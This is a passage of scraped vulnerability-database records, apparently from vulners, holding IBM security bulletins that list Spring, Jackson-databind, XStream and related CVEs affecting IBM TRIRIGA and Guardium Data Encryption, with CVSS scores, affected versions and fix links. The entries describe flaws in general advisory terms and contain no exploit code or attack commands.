TRIRIGA Application Platform, is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \n**DESCRIPTION:** Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/151641> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Tririga | Affected Versions \n---|--- \nIBM TRIRIGA Application Platform | 3.5.3 \nIBM TRIRIGA Application Platform | 3.6.0 \n \n## Remediation/Fixes\n\n**Product** | **VRMF** | \n\n**Remediation/First Fix** \n \n---|---|--- \nIBM TRIRIGA Application Platform | 3.5.3.6 | The fix is available for download on [FixCentral](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Tivoli&product=ibm/Tivoli/IBM+TRIRIGA+Application+Platform&release=3.5.3.6&platform=All&function=all>). \nIBM TRIRIGA Application Platform | 3.6.0.3 | The fix is available for download on [FixCentral](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/IBM+TRIRIGA+Application+Platform&release=3.6.0.3&platform=All&function=all>). \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-03T20:50:01", "type": "ibm", "title": "Security Bulletin: Vulnerability in Pivotal Spring Framework affects IBM TRIRIGA Application Platform (CVE-2018-15786)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756", "CVE-2018-15786"], "modified": "2019-05-03T20:50:01", "id": "FB902F7DAECE32D4B1271EF75E54E1A69E0744F851DC89BD0974AF712F58A834", "href": "https://www.ibm.com/support/pages/node/879449", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-27T21:47:34", "description": "## Summary\n\nThere are multiple vulnerabilities identified in IBM Guardium Data Encryption (GDE). These vulnerabilities have been fixed in GDE 4.0.0.4. Please apply the latest version for the fixes.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2017-7957](<https://vulners.com/cve/CVE-2017-7957>) \n** DESCRIPTION: **XStream is vulnerable to a denial of service, caused by the improper handling of attempts to create an instance of the primitive type 'void' during unmarshalling. A remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/125800](<https://exchange.xforce.ibmcloud.com/vulnerabilities/125800>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2016-3674](<https://vulners.com/cve/CVE-2016-3674>) \n** DESCRIPTION: **XStream could allow a remote attacker to obtain sensitive information, caused by an error when processing XML external entities. By sending specially-crafted XML data, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111806](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111806>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-10237](<https://vulners.com/cve/CVE-2018-10237>) \n** DESCRIPTION: **Google Guava is vulnerable to a denial of service, caused by improper eager allocation checks in the AtomicDoubleArray and CompoundOrdering class. By sending a specially-crafted data, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/142508](<https://exchange.xforce.ibmcloud.com/vulnerabilities/142508>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-4702](<https://vulners.com/cve/CVE-2019-4702>) \n** DESCRIPTION: **IBM Guardium Data Encryption (GDE) specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors. \nCVSS Base score: 4.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171937](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171937>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2019-4160](<https://vulners.com/cve/CVE-2019-4160>) \n** DESCRIPTION: **IBM Guardium Data Encryption (GDE) uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/158577](<https://exchange.xforce.ibmcloud.com/vulnerabilities/158577>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2019-11272](<https://vulners.com/cve/CVE-2019-11272>) \n** DESCRIPTION: **Pivotal Spring Security could allow a remote attacker to bypass security restrictions, caused by a flaw in the PlaintextPasswordEncoder function. By using a password of \"null\", an attacker could exploit this vulnerability to bypass access restrictions. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/166568](<https://exchange.xforce.ibmcloud.com/vulnerabilities/166568>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2019-3795](<https://vulners.com/cve/CVE-2019-3795>) \n** DESCRIPTION: **Pivotal Spring Security could provide weaker than expected security, caused by an insecure randomness flaw when using SecureRandomFactoryBean#setSeed to configure a SecureRandom instance. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/159543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/159543>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N) \n \n** CVEID: **[CVE-2019-3774](<https://vulners.com/cve/CVE-2019-3774>) \n** DESCRIPTION: **Pivotal Spring Batch could allow a remote attacker to obtain sensitive information, caused by improper handling of XML External Entity (XXE). By persuading a victim to open a specially-crafted file, a remote attacker could exploit this vulnerability to obtain sensitive information from the system. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155922](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155922>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2018-15756](<https://vulners.com/cve/CVE-2018-15756>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to a denial of service, caused by improper handling of range request by the ResourceHttpRequestHandler. By adding a range header with a high number of ranges, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151641](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151641>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-11040](<https://vulners.com/cve/CVE-2018-11040>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to bypass security restrictions, caused by a flaw in AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView. By sending a specially-crafted request, an attacker could exploit this vulnerability to perform cross-domain requests. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145413](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145413>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2018-11039](<https://vulners.com/cve/CVE-2018-11039>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to cross-site tracing, caused by a flaw in the HiddenHttpMethodFilter in Spring MVC. By persuading a victim to visit a specially-crafted Web site, an attacker could exploit this vulnerability to cause the victim's browser to invoke a TRACE request to return sensitive header information including cookies or authentication data from third-party domains. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/145412](<https://exchange.xforce.ibmcloud.com/vulnerabilities/145412>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-1275](<https://vulners.com/cve/CVE-2018-1275>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141565](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141565>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-1272](<https://vulners.com/cve/CVE-2018-1272>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote authenticated attacker to gain elevated privileges on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain elevated privileges. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141286](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141286>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-1271](<https://vulners.com/cve/CVE-2018-1271>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by improper validation of user request. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to configure Spring MVC to serve static resources. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141285](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141285>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-1270](<https://vulners.com/cve/CVE-2018-1270>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/141284](<https://exchange.xforce.ibmcloud.com/vulnerabilities/141284>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-1257](<https://vulners.com/cve/CVE-2018-1257>) \n** DESCRIPTION: **Pivotal Spring Framework is vulnerable to a denial of service. By sending a specially-crafted message, a remote attacker could exploit this vulnerability to perform a regular expression denial of service attack. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/143316](<https://exchange.xforce.ibmcloud.com/vulnerabilities/143316>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-1199](<https://vulners.com/cve/CVE-2018-1199>) \n** DESCRIPTION: **Pivotal Spring Security and Spring Framework could allow a remote attacker to bypass security restrictions, caused by the failure to consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker could exploit this vulnerability to bypass access restrictions and gain access to the server and obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138601](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138601>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2016-9878](<https://vulners.com/cve/CVE-2016-9878>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by the failure to sanitize paths provided to ResourceServlet. An attacker could send a specially-crafted URL request containing directory traversal sequences to view arbitrary files on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/120241](<https://exchange.xforce.ibmcloud.com/vulnerabilities/120241>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2017-4995](<https://vulners.com/cve/CVE-2017-4995>) \n** DESCRIPTION: **Pivotal Spring Security could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw in the default Jackson configuration. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/135391](<https://exchange.xforce.ibmcloud.com/vulnerabilities/135391>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-1000632](<https://vulners.com/cve/CVE-2018-1000632>) \n** DESCRIPTION: **dom4j could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation in multiple methods. By sending a specially-crafted XML content, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/148750](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148750>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2019-4687](<https://vulners.com/cve/CVE-2019-4687>) \n** DESCRIPTION: **IBM Guardium Data Encryption (GDE) stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/171823](<https://exchange.xforce.ibmcloud.com/vulnerabilities/171823>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2019-12814](<https://vulners.com/cve/CVE-2019-12814>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a polymorphic typing issue. By sending a specially-crafted JSON message, an attacker could exploit this vulnerability to read arbitrary local files on the server. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162875](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162875>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2019-12384](<https://vulners.com/cve/CVE-2019-12384>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by the failure to block the logback-core class from polymorphic deserialization. By sending a specially-crafted JSON message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/162849](<https://exchange.xforce.ibmcloud.com/vulnerabilities/162849>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2019-12086](<https://vulners.com/cve/CVE-2019-12086>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a Polymorphic Typing issue that occurs due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. By sending a specially-crafted JSON message, a remote attacker could exploit this vulnerability to read arbitrary local files on the server. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/161256](<https://exchange.xforce.ibmcloud.com/vulnerabilities/161256>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-7489](<https://vulners.com/cve/CVE-2018-7489>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw in the readValue method of the ObjectMapper. By sending specially crafted JSON input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/139549](<https://exchange.xforce.ibmcloud.com/vulnerabilities/139549>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-5968](<https://vulners.com/cve/CVE-2018-5968>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by deserialization flaws. By using two different gadgets that bypass a blocklist, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/138088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138088>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2018-19362](<https://vulners.com/cve/CVE-2018-19362>) \n** DESCRIPTION: **An unspecified error with failure to block the jboss-common-core class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155093](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155093>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-19361](<https://vulners.com/cve/CVE-2018-19361>) \n** DESCRIPTION: **An unspecified error with failure to block the openjpa class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155092](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155092>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-19360](<https://vulners.com/cve/CVE-2018-19360>) \n** DESCRIPTION: **An unspecified error with failure to block the axis2-transport-jms class from polymorphic deserialization in FasterXML jackson-databind has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155091](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155091>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2018-14721](<https://vulners.com/cve/CVE-2018-14721>) \n** DESCRIPTION: **FasterXML jackson-databind is vulnerable to server-side request forgery, caused by the failure to block the axis2-jaxws class from polymorphic deserialization. A remote authenticated attacker could exploit this vulnerability to obtain sensitive data. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155136](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155136>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-14720](<https://vulners.com/cve/CVE-2018-14720>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by an XML external entity (XXE) error when processing XML data by JDK classes. By sending a specially-crafted XML data. A remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155137](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155137>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-14719](<https://vulners.com/cve/CVE-2018-14719>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by the failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155138](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155138>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-14718](<https://vulners.com/cve/CVE-2018-14718>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by the failure to block the slf4j-ext class from polymorphic deserialization. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155139](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155139>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-12023](<https://vulners.com/cve/CVE-2018-12023>) \n** DESCRIPTION: **An unspecified vulnerability in multiple Oracle products could allow an unauthenticated attacker to take control of the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/151425](<https://exchange.xforce.ibmcloud.com/vulnerabilities/151425>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-12022](<https://vulners.com/cve/CVE-2018-12022>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when the Default Typing is enabled. By sending a specially-crafted request in LDAP service, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/163227](<https://exchange.xforce.ibmcloud.com/vulnerabilities/163227>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-11307](<https://vulners.com/cve/CVE-2018-11307>) \n** DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by an issue when untrusted content is deserialized with default typing enabled. By sending specially-crafted content over FTP, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/163528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/163528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-1000873](<https://vulners.com/cve/CVE-2018-1000873>) \n** DESCRIPTION: **FasterXML jackson-databind is vulnerable to a denial of service, caused by improper input validation by the nanoseconds time value field. By persuading a victim to deserialize specially-crafted input, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/154804](<https://exchange.xforce.ibmcloud.com/vulnerabilities/154804>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2017-7525](<https://vulners.com/cve/CVE-2017-7525>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw within the Jackson JSON library in the readValue method of the ObjectMapper. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/134639](<https://exchange.xforce.ibmcloud.com/vulnerabilities/134639>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2017-17485](<https://vulners.com/cve/CVE-2017-17485>) \n** DESCRIPTION: **Jackson-databind could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the default-typing feature. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/137340](<https://exchange.xforce.ibmcloud.com/vulnerabilities/137340>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2017-15095](<https://vulners.com/cve/CVE-2017-15095>) \n** DESCRIPTION: **Jackson Library could allow a remote attacker to execute arbitrary code on the system, caused by a deserialization flaw in the readValue() method of the ObjectMapper. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/135123](<https://exchange.xforce.ibmcloud.com/vulnerabilities/135123>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nGDE| 3.0.0.2 \n \n\n\n## Remediation/Fixes\n\nProduct(s)| Fixed Version \n---|--- \nGDE| [4.0.0.4](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=800f008fdb1ce41080b2345239961960&sysparm_article=KB0023194sys_kb_id=9269c25b1b795410f2888739cd4bcb16> \"4.0.0.0\" ) \n \n## Workarounds and Mitigations\n\nAffected Component| Fixed Version \n---|--- \nIBM Guardium for Cloud Key Management (GCKM)| GCKM 1.8.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-12T14:42:24", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities in IBM Guardium Data Encryption (GDE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3674", "CVE-2016-9878", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-4995", "CVE-2017-7525", "CVE-2017-7957", "CVE-2018-1000632", "CVE-2018-1000873", "CVE-2018-10237", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-11307", "CVE-2018-1199", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-1257", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-5968", "CVE-2018-7489", "CVE-2019-11272", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12814", "CVE-2019-3774", "CVE-2019-3795", "CVE-2019-4160", 